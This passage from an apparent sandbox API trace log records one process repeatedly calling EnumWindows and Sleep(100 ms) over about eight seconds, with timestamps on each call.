(dwMilliseconds=0x64) [0299.592] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.592] Sleep (dwMilliseconds=0x64) [0299.630] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.631] Sleep (dwMilliseconds=0x64) [0299.648] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.648] Sleep (dwMilliseconds=0x64) [0299.672] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.672] Sleep (dwMilliseconds=0x64) [0299.711] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.712] Sleep (dwMilliseconds=0x64) [0299.814] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.815] Sleep (dwMilliseconds=0x64) [0299.826] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.827] Sleep (dwMilliseconds=0x64) [0299.865] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.866] Sleep (dwMilliseconds=0x64) [0299.906] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.946] Sleep (dwMilliseconds=0x64) [0299.952] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.953] Sleep (dwMilliseconds=0x64) [0299.984] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0299.985] Sleep (dwMilliseconds=0x64) [0300.027] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.028] Sleep (dwMilliseconds=0x64) [0300.074] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.074] Sleep (dwMilliseconds=0x64) [0300.078] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.078] Sleep (dwMilliseconds=0x64) [0300.135] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.136] Sleep (dwMilliseconds=0x64) [0300.178] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.179] Sleep (dwMilliseconds=0x64) [0300.225] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.225] Sleep (dwMilliseconds=0x64) [0300.237] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.238] Sleep (dwMilliseconds=0x64) [0300.276] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.276] Sleep (dwMilliseconds=0x64) [0300.311] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.311] Sleep (dwMilliseconds=0x64) [0300.316] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.316] Sleep (dwMilliseconds=0x64) [0300.353] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.353] Sleep (dwMilliseconds=0x64) [0300.391] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.392] Sleep (dwMilliseconds=0x64) [0300.406] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.406] Sleep (dwMilliseconds=0x64) [0300.432] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.433] Sleep (dwMilliseconds=0x64) [0300.471] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.472] Sleep (dwMilliseconds=0x64) [0300.507] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.508] Sleep (dwMilliseconds=0x64) [0300.512] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.513] Sleep (dwMilliseconds=0x64) [0300.552] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.553] Sleep (dwMilliseconds=0x64) [0300.598] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.599] Sleep (dwMilliseconds=0x64) [0300.622] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.623] Sleep (dwMilliseconds=0x64) [0300.639] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.640] Sleep (dwMilliseconds=0x64) [0300.676] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.676] Sleep (dwMilliseconds=0x64) [0300.710] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.711] Sleep (dwMilliseconds=0x64) [0300.716] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.717] Sleep (dwMilliseconds=0x64) [0300.752] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.752] Sleep (dwMilliseconds=0x64) [0300.792] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.792] Sleep (dwMilliseconds=0x64) [0300.828] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.828] Sleep (dwMilliseconds=0x64) [0300.874] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.874] Sleep (dwMilliseconds=0x64) [0300.883] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.884] Sleep (dwMilliseconds=0x64) [0300.914] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0300.914] Sleep (dwMilliseconds=0x64) [0301.028] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.028] Sleep (dwMilliseconds=0x64) [0301.053] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.053] Sleep (dwMilliseconds=0x64) [0301.086] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.087] Sleep (dwMilliseconds=0x64) [0301.128] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.128] Sleep (dwMilliseconds=0x64) [0301.153] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.154] Sleep (dwMilliseconds=0x64) [0301.172] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.172] Sleep (dwMilliseconds=0x64) [0301.245] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.246] Sleep (dwMilliseconds=0x64) [0301.287] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.288] Sleep (dwMilliseconds=0x64) [0301.306] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.306] Sleep (dwMilliseconds=0x64) [0301.340] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.340] Sleep (dwMilliseconds=0x64) [0301.380] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.381] Sleep (dwMilliseconds=0x64) [0301.423] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.423] Sleep (dwMilliseconds=0x64) [0301.426] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.426] Sleep (dwMilliseconds=0x64) [0301.464] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.465] Sleep (dwMilliseconds=0x64) [0301.512] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.512] Sleep (dwMilliseconds=0x64) [0301.551] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.551] Sleep (dwMilliseconds=0x64) [0301.556] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.557] Sleep (dwMilliseconds=0x64) [0301.596] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.597] Sleep (dwMilliseconds=0x64) [0301.665] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.666] Sleep (dwMilliseconds=0x64) [0301.676] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.676] Sleep (dwMilliseconds=0x64) [0301.714] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.714] Sleep (dwMilliseconds=0x64) [0301.753] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.754] Sleep (dwMilliseconds=0x64) [0301.774] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.774] Sleep (dwMilliseconds=0x64) [0301.794] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.794] Sleep (dwMilliseconds=0x64) [0301.834] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.834] Sleep (dwMilliseconds=0x64) [0301.878] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.879] Sleep (dwMilliseconds=0x64) [0301.890] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.890] Sleep (dwMilliseconds=0x64) [0301.933] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.933] Sleep (dwMilliseconds=0x64) [0301.972] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.973] Sleep (dwMilliseconds=0x64) [0301.991] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0301.991] Sleep (dwMilliseconds=0x64) [0302.011] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.012] Sleep (dwMilliseconds=0x64) [0302.050] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.050] Sleep (dwMilliseconds=0x64) [0302.103] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.104] Sleep (dwMilliseconds=0x64) [0302.111] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.112] Sleep (dwMilliseconds=0x64) [0302.155] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.156] Sleep (dwMilliseconds=0x64) [0302.209] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.210] Sleep (dwMilliseconds=0x64) [0302.220] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.221] Sleep (dwMilliseconds=0x64) [0302.249] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.250] Sleep (dwMilliseconds=0x64) [0302.286] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.287] Sleep (dwMilliseconds=0x64) [0302.319] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.320] Sleep (dwMilliseconds=0x64) [0302.335] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.335] Sleep (dwMilliseconds=0x64) [0302.374] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.374] Sleep (dwMilliseconds=0x64) [0302.412] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.412] Sleep (dwMilliseconds=0x64) [0302.416] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.416] Sleep (dwMilliseconds=0x64) [0302.450] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.451] Sleep (dwMilliseconds=0x64) [0302.492] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.492] Sleep (dwMilliseconds=0x64) [0302.510] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.510] Sleep (dwMilliseconds=0x64) [0302.531] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.532] Sleep (dwMilliseconds=0x64) [0302.571] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.571] Sleep (dwMilliseconds=0x64) [0302.596] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.596] Sleep (dwMilliseconds=0x64) [0302.613] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.613] Sleep (dwMilliseconds=0x64) [0302.649] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.650] Sleep (dwMilliseconds=0x64) [0302.682] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.682] Sleep (dwMilliseconds=0x64) [0302.689] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.690] Sleep (dwMilliseconds=0x64) [0302.725] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.725] Sleep (dwMilliseconds=0x64) [0302.764] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.765] Sleep (dwMilliseconds=0x64) [0302.773] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.774] Sleep (dwMilliseconds=0x64) [0302.802] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.803] Sleep (dwMilliseconds=0x64) [0302.841] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.842] Sleep (dwMilliseconds=0x64) [0302.875] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.876] Sleep (dwMilliseconds=0x64) [0302.886] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.887] Sleep (dwMilliseconds=0x64) [0302.924] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.925] Sleep (dwMilliseconds=0x64) [0302.961] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.961] Sleep (dwMilliseconds=0x64) [0302.965] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0302.965] Sleep (dwMilliseconds=0x64) [0303.001] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.001] Sleep (dwMilliseconds=0x64) [0303.037] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.037] Sleep (dwMilliseconds=0x64) [0303.048] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.048] Sleep (dwMilliseconds=0x64) [0303.088] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.089] Sleep (dwMilliseconds=0x64) [0303.127] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.127] Sleep (dwMilliseconds=0x64) [0303.148] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.149] Sleep (dwMilliseconds=0x64) [0303.166] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.167] Sleep (dwMilliseconds=0x64) [0303.221] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.221] Sleep (dwMilliseconds=0x64) [0303.254] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.254] Sleep (dwMilliseconds=0x64) [0303.260] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.260] Sleep (dwMilliseconds=0x64) [0303.296] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.297] Sleep (dwMilliseconds=0x64) [0303.374] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.375] Sleep (dwMilliseconds=0x64) [0303.382] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.382] Sleep (dwMilliseconds=0x64) [0303.416] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.417] Sleep (dwMilliseconds=0x64) [0303.453] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.454] Sleep (dwMilliseconds=0x64) [0303.490] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.490] Sleep (dwMilliseconds=0x64) [0303.497] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.498] Sleep (dwMilliseconds=0x64) [0303.538] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.538] Sleep (dwMilliseconds=0x64) [0303.579] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.579] Sleep (dwMilliseconds=0x64) [0303.600] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.600] Sleep (dwMilliseconds=0x64) [0303.618] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.618] Sleep (dwMilliseconds=0x64) [0303.655] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.655] Sleep (dwMilliseconds=0x64) [0303.694] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.695] Sleep (dwMilliseconds=0x64) [0303.708] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.708] Sleep (dwMilliseconds=0x64) [0303.734] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.735] Sleep (dwMilliseconds=0x64) [0303.772] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.772] Sleep (dwMilliseconds=0x64) [0303.815] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.816] Sleep (dwMilliseconds=0x64) [0303.842] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.843] Sleep (dwMilliseconds=0x64) [0303.885] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.886] Sleep (dwMilliseconds=0x64) [0303.924] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.924] Sleep (dwMilliseconds=0x64) [0303.961] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.961] Sleep (dwMilliseconds=0x64) [0303.963] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0303.964] Sleep (dwMilliseconds=0x64) [0304.000] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.001] Sleep (dwMilliseconds=0x64) [0304.044] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.045] Sleep (dwMilliseconds=0x64) [0304.082] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.082] Sleep (dwMilliseconds=0x64) [0304.094] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.094] Sleep (dwMilliseconds=0x64) [0304.124] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.125] Sleep (dwMilliseconds=0x64) [0304.163] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.163] Sleep (dwMilliseconds=0x64) [0304.217] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.217] Sleep (dwMilliseconds=0x64) [0304.222] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.223] Sleep (dwMilliseconds=0x64) [0304.256] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.257] Sleep (dwMilliseconds=0x64) [0304.294] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.294] Sleep (dwMilliseconds=0x64) [0304.311] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.311] Sleep (dwMilliseconds=0x64) [0304.333] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.334] Sleep (dwMilliseconds=0x64) [0304.373] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.374] Sleep (dwMilliseconds=0x64) [0304.406] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.406] Sleep (dwMilliseconds=0x64) [0304.414] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.414] Sleep (dwMilliseconds=0x64) [0304.450] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.451] Sleep (dwMilliseconds=0x64) [0304.488] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.488] Sleep (dwMilliseconds=0x64) [0304.548] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.549] Sleep (dwMilliseconds=0x64) [0304.580] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.580] Sleep (dwMilliseconds=0x64) [0304.629] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.630] Sleep (dwMilliseconds=0x64) [0304.654] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.654] Sleep (dwMilliseconds=0x64) [0304.672] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.673] Sleep (dwMilliseconds=0x64) [0304.731] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.795] Sleep (dwMilliseconds=0x64) [0304.798] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.800] Sleep (dwMilliseconds=0x64) [0304.840] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.841] Sleep (dwMilliseconds=0x64) [0304.892] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.893] Sleep (dwMilliseconds=0x64) [0304.923] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.924] Sleep (dwMilliseconds=0x64) [0304.941] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.941] Sleep (dwMilliseconds=0x64) [0304.981] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0304.982] Sleep (dwMilliseconds=0x64) [0305.020] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.020] Sleep (dwMilliseconds=0x64) [0305.022] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.023] Sleep (dwMilliseconds=0x64) [0305.067] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.068] Sleep (dwMilliseconds=0x64) [0305.108] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.108] Sleep (dwMilliseconds=0x64) [0305.123] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.123] Sleep (dwMilliseconds=0x64) [0305.149] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.149] Sleep (dwMilliseconds=0x64) [0305.186] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.187] Sleep (dwMilliseconds=0x64) [0305.233] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.234] Sleep (dwMilliseconds=0x64) [0305.243] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.244] Sleep (dwMilliseconds=0x64) [0305.283] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.283] Sleep (dwMilliseconds=0x64) [0305.319] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.320] Sleep (dwMilliseconds=0x64) [0305.323] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.324] Sleep (dwMilliseconds=0x64) [0305.359] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.360] Sleep (dwMilliseconds=0x64) [0305.397] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.398] Sleep (dwMilliseconds=0x64) [0305.418] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.420] Sleep (dwMilliseconds=0x64) [0305.439] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.440] Sleep (dwMilliseconds=0x64) [0305.479] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.479] Sleep (dwMilliseconds=0x64) [0305.520] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.521] Sleep (dwMilliseconds=0x64) [0305.531] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.532] Sleep (dwMilliseconds=0x64) [0305.561] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.562] Sleep (dwMilliseconds=0x64) [0305.598] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.598] Sleep (dwMilliseconds=0x64) [0305.623] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.623] Sleep (dwMilliseconds=0x64) [0305.638] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.638] Sleep (dwMilliseconds=0x64) [0305.674] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.675] Sleep (dwMilliseconds=0x64) [0305.751] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.751] Sleep (dwMilliseconds=0x64) [0305.754] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.754] Sleep (dwMilliseconds=0x64) [0305.790] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.790] Sleep (dwMilliseconds=0x64) [0305.829] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.829] Sleep (dwMilliseconds=0x64) [0305.846] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.846] Sleep (dwMilliseconds=0x64) [0305.867] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.868] Sleep (dwMilliseconds=0x64) [0305.906] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.906] Sleep (dwMilliseconds=0x64) [0305.941] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.942] Sleep (dwMilliseconds=0x64) [0305.951] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.951] Sleep (dwMilliseconds=0x64) [0305.988] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0305.989] Sleep (dwMilliseconds=0x64) [0306.027] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.027] Sleep (dwMilliseconds=0x64) [0306.046] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.047] Sleep (dwMilliseconds=0x64) [0306.074] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.075] Sleep (dwMilliseconds=0x64) [0306.113] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.113] Sleep (dwMilliseconds=0x64) [0306.162] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.164] Sleep (dwMilliseconds=0x64) [0306.179] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.180] Sleep (dwMilliseconds=0x64) [0306.238] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.238] Sleep (dwMilliseconds=0x64) [0306.278] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.279] Sleep (dwMilliseconds=0x64) [0306.317] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.318] Sleep (dwMilliseconds=0x64) [0306.351] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.352] Sleep (dwMilliseconds=0x64) [0306.367] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.368] Sleep (dwMilliseconds=0x64) [0306.405] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.406] Sleep (dwMilliseconds=0x64) [0306.447] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.447] Sleep (dwMilliseconds=0x64) [0306.475] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.475] Sleep (dwMilliseconds=0x64) [0306.488] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.488] Sleep (dwMilliseconds=0x64) [0306.524] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.525] Sleep (dwMilliseconds=0x64) [0306.564] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.565] Sleep (dwMilliseconds=0x64) [0306.598] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.598] Sleep (dwMilliseconds=0x64) [0306.604] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.605] Sleep (dwMilliseconds=0x64) [0306.645] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.645] Sleep (dwMilliseconds=0x64) [0306.684] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.684] Sleep (dwMilliseconds=0x64) [0306.718] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.718] Sleep (dwMilliseconds=0x64) [0306.729] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.730] Sleep (dwMilliseconds=0x64) [0306.769] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.770] Sleep (dwMilliseconds=0x64) [0306.829] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.829] Sleep (dwMilliseconds=0x64) [0306.847] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.847] Sleep (dwMilliseconds=0x64) [0306.939] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0306.939] Sleep (dwMilliseconds=0x64) [0307.067] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.068] Sleep (dwMilliseconds=0x64) [0307.144] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.145] Sleep (dwMilliseconds=0x64) [0307.191] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.192] Sleep (dwMilliseconds=0x64) [0307.288] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.288] Sleep (dwMilliseconds=0x64) [0307.336] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.336] Sleep (dwMilliseconds=0x64) [0307.364] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.365] Sleep (dwMilliseconds=0x64) [0307.381] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0307.381] Sleep (dwMilliseconds=0x64) [0307.418] 